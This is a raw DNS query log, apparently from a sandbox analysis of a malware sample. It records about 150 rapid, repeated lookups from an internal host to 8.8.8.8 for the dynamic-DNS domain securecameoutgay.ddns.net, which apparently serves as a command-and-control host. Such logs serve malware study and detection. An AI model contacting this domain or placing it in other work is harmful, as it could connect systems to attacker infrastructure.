                                                    Oct 12, 2024 23:05:15.622303009 CEST192.168.2.148.8.8.80x174bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.635277033 CEST192.168.2.148.8.8.80x2ee6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.643182993 CEST192.168.2.148.8.8.80x2ee6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.651026011 CEST192.168.2.148.8.8.80x2ee6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.659013033 CEST192.168.2.148.8.8.80x2ee6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.666920900 CEST192.168.2.148.8.8.80x2ee6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.679883003 CEST192.168.2.148.8.8.80x755fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.690859079 CEST192.168.2.148.8.8.80x755fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.699923992 CEST192.168.2.148.8.8.80x755fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.711093903 CEST192.168.2.148.8.8.80x755fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.719602108 CEST192.168.2.148.8.8.80x755fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.731482983 CEST192.168.2.148.8.8.80x192bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.741672039 CEST192.168.2.148.8.8.80x192bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.752157927 CEST192.168.2.148.8.8.80x192bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.759697914 CEST192.168.2.148.8.8.80x192bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.767473936 CEST192.168.2.148.8.8.80x192bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.775657892 CEST192.168.2.148.8.8.80x15eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.784960032 CEST192.168.2.148.8.8.80x15eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.801698923 CEST192.168.2.148.8.8.80x15eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.808896065 CEST192.168.2.148.8.8.80x15eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.819776058 CEST192.168.2.148.8.8.80x15eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.831057072 CEST192.168.2.148.8.8.80xf461Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.839555025 CEST192.168.2.148.8.8.80xf461Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.847215891 CEST192.168.2.148.8.8.80xf461Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.855892897 CEST192.168.2.148.8.8.80xf461Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.867002964 CEST192.168.2.148.8.8.80xf461Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.876154900 CEST192.168.2.148.8.8.80xb8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.887350082 CEST192.168.2.148.8.8.80xb8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.895767927 CEST192.168.2.148.8.8.80xb8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.904064894 CEST192.168.2.148.8.8.80xb8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.915514946 CEST192.168.2.148.8.8.80xb8a2Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.924474955 CEST192.168.2.148.8.8.80x4b1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.936687946 CEST192.168.2.148.8.8.80x4b1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.947997093 CEST192.168.2.148.8.8.80x4b1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.959598064 CEST192.168.2.148.8.8.80x4b1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.967315912 CEST192.168.2.148.8.8.80x4b1fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.976092100 CEST192.168.2.148.8.8.80xc082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.987421036 CEST192.168.2.148.8.8.80xc082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:15.999597073 CEST192.168.2.148.8.8.80xc082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.011651993 CEST192.168.2.148.8.8.80xc082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.019645929 CEST192.168.2.148.8.8.80xc082Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.032426119 CEST192.168.2.148.8.8.80xcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.042021036 CEST192.168.2.148.8.8.80xcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.051356077 CEST192.168.2.148.8.8.80xcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.059663057 CEST192.168.2.148.8.8.80xcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.071738005 CEST192.168.2.148.8.8.80xcaStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.084343910 CEST192.168.2.148.8.8.80xf94bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.095470905 CEST192.168.2.148.8.8.80xf94bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.107208967 CEST192.168.2.148.8.8.80xf94bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.115258932 CEST192.168.2.148.8.8.80xf94bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.123209000 CEST192.168.2.148.8.8.80xf94bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.131759882 CEST192.168.2.148.8.8.80xb38dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.138909101 CEST192.168.2.148.8.8.80xb38dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.146898985 CEST192.168.2.148.8.8.80xb38dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.156441927 CEST192.168.2.148.8.8.80xb38dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.167013884 CEST192.168.2.148.8.8.80xb38dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.175832033 CEST192.168.2.148.8.8.80x373bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.183839083 CEST192.168.2.148.8.8.80x373bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.191261053 CEST192.168.2.148.8.8.80x373bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.198925018 CEST192.168.2.148.8.8.80x373bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.207191944 CEST192.168.2.148.8.8.80x373bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.215008974 CEST192.168.2.148.8.8.80xf2adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.222378016 CEST192.168.2.148.8.8.80xf2adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.231189013 CEST192.168.2.148.8.8.80xf2adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.239644051 CEST192.168.2.148.8.8.80xf2adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.247514009 CEST192.168.2.148.8.8.80xf2adStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.255434036 CEST192.168.2.148.8.8.80xc81bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.263092041 CEST192.168.2.148.8.8.80xc81bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.271033049 CEST192.168.2.148.8.8.80xc81bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.279086113 CEST192.168.2.148.8.8.80xc81bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.287112951 CEST192.168.2.148.8.8.80xc81bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.295567989 CEST192.168.2.148.8.8.80xbdd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.303376913 CEST192.168.2.148.8.8.80xbdd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.311647892 CEST192.168.2.148.8.8.80xbdd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.319735050 CEST192.168.2.148.8.8.80xbdd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.327208042 CEST192.168.2.148.8.8.80xbdd9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.335175991 CEST192.168.2.148.8.8.80x67fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.343015909 CEST192.168.2.148.8.8.80x67fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.350824118 CEST192.168.2.148.8.8.80x67fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.359028101 CEST192.168.2.148.8.8.80x67fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.366919994 CEST192.168.2.148.8.8.80x67fbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.375436068 CEST192.168.2.148.8.8.80xd4c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.383666992 CEST192.168.2.148.8.8.80xd4c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.391761065 CEST192.168.2.148.8.8.80xd4c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.400897980 CEST192.168.2.148.8.8.80xd4c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.408488989 CEST192.168.2.148.8.8.80xd4c3Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.417558908 CEST192.168.2.148.8.8.80x421bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.426335096 CEST192.168.2.148.8.8.80x421bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.434678078 CEST192.168.2.148.8.8.80x421bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.443169117 CEST192.168.2.148.8.8.80x421bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.451757908 CEST192.168.2.148.8.8.80x421bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.461041927 CEST192.168.2.148.8.8.80x88e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.469105959 CEST192.168.2.148.8.8.80x88e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.476511955 CEST192.168.2.148.8.8.80x88e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.484014988 CEST192.168.2.148.8.8.80x88e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.491666079 CEST192.168.2.148.8.8.80x88e9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.501054049 CEST192.168.2.148.8.8.80xcdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.509552002 CEST192.168.2.148.8.8.80xcdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.517533064 CEST192.168.2.148.8.8.80xcdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.525091887 CEST192.168.2.148.8.8.80xcdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.533611059 CEST192.168.2.148.8.8.80xcdd6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.543648958 CEST192.168.2.148.8.8.80x86c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.552359104 CEST192.168.2.148.8.8.80x86c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.560162067 CEST192.168.2.148.8.8.80x86c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.570733070 CEST192.168.2.148.8.8.80x86c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.579925060 CEST192.168.2.148.8.8.80x86c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.588876009 CEST192.168.2.148.8.8.80x8562Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.596982002 CEST192.168.2.148.8.8.80x8562Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.605289936 CEST192.168.2.148.8.8.80x8562Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.613017082 CEST192.168.2.148.8.8.80x8562Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.620956898 CEST192.168.2.148.8.8.80x8562Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.629477978 CEST192.168.2.148.8.8.80x50aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.638087034 CEST192.168.2.148.8.8.80x50aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.647785902 CEST192.168.2.148.8.8.80x50aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.655088902 CEST192.168.2.148.8.8.80x50aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.663423061 CEST192.168.2.148.8.8.80x50aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.671921968 CEST192.168.2.148.8.8.80xf14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.679666996 CEST192.168.2.148.8.8.80xf14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.687459946 CEST192.168.2.148.8.8.80xf14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.695534945 CEST192.168.2.148.8.8.80xf14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.703385115 CEST192.168.2.148.8.8.80xf14cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.711848021 CEST192.168.2.148.8.8.80x5a1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.719300985 CEST192.168.2.148.8.8.80x5a1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.726531029 CEST192.168.2.148.8.8.80x5a1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.734288931 CEST192.168.2.148.8.8.80x5a1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.741523981 CEST192.168.2.148.8.8.80x5a1cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.749995947 CEST192.168.2.148.8.8.80xae11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.757829905 CEST192.168.2.148.8.8.80xae11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.765130043 CEST192.168.2.148.8.8.80xae11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.772514105 CEST192.168.2.148.8.8.80xae11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.780513048 CEST192.168.2.148.8.8.80xae11Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.789212942 CEST192.168.2.148.8.8.80x1feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.797348022 CEST192.168.2.148.8.8.80x1feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.805048943 CEST192.168.2.148.8.8.80x1feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.812468052 CEST192.168.2.148.8.8.80x1feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.820115089 CEST192.168.2.148.8.8.80x1feStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.828368902 CEST192.168.2.148.8.8.80x6b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.835855007 CEST192.168.2.148.8.8.80x6b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.843235016 CEST192.168.2.148.8.8.80x6b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.850989103 CEST192.168.2.148.8.8.80x6b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.858552933 CEST192.168.2.148.8.8.80x6b4aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.866862059 CEST192.168.2.148.8.8.80x16c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.876036882 CEST192.168.2.148.8.8.80x16c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.883229971 CEST192.168.2.148.8.8.80x16c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.890762091 CEST192.168.2.148.8.8.80x16c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.898421049 CEST192.168.2.148.8.8.80x16c8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.907074928 CEST192.168.2.148.8.8.80xa926Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.914639950 CEST192.168.2.148.8.8.80xa926Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.921662092 CEST192.168.2.148.8.8.80xa926Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.929297924 CEST192.168.2.148.8.8.80xa926Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.937004089 CEST192.168.2.148.8.8.80xa926Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.945358038 CEST192.168.2.148.8.8.80xeb00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.953241110 CEST192.168.2.148.8.8.80xeb00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.961242914 CEST192.168.2.148.8.8.80xeb00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.968889952 CEST192.168.2.148.8.8.80xeb00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.976912975 CEST192.168.2.148.8.8.80xeb00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.985450029 CEST192.168.2.148.8.8.80x19ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:16.993309021 CEST192.168.2.148.8.8.80x19ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.001734972 CEST192.168.2.148.8.8.80x19ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.009526014 CEST192.168.2.148.8.8.80x19ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.019639015 CEST192.168.2.148.8.8.80x19ffStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.027784109 CEST192.168.2.148.8.8.80x6d00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.034985065 CEST192.168.2.148.8.8.80x6d00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.041908979 CEST192.168.2.148.8.8.80x6d00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.048995972 CEST192.168.2.148.8.8.80x6d00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.056302071 CEST192.168.2.148.8.8.80x6d00Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.064270020 CEST192.168.2.148.8.8.80x68aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.071801901 CEST192.168.2.148.8.8.80x68aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.080030918 CEST192.168.2.148.8.8.80x68aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.087479115 CEST192.168.2.148.8.8.80x68aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.094454050 CEST192.168.2.148.8.8.80x68aeStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.102300882 CEST192.168.2.148.8.8.80x1bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.109653950 CEST192.168.2.148.8.8.80x1bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.117341995 CEST192.168.2.148.8.8.80x1bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.125118971 CEST192.168.2.148.8.8.80x1bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.134274006 CEST192.168.2.148.8.8.80x1bf9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.142903090 CEST192.168.2.148.8.8.80x7ba9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.150291920 CEST192.168.2.148.8.8.80x7ba9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.157653093 CEST192.168.2.148.8.8.80x7ba9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.165550947 CEST192.168.2.148.8.8.80x7ba9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.172764063 CEST192.168.2.148.8.8.80x7ba9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.180530071 CEST192.168.2.148.8.8.80xba82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.188374043 CEST192.168.2.148.8.8.80xba82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.196032047 CEST192.168.2.148.8.8.80xba82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.203548908 CEST192.168.2.148.8.8.80xba82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.210880041 CEST192.168.2.148.8.8.80xba82Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.218986034 CEST192.168.2.148.8.8.80xdef7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
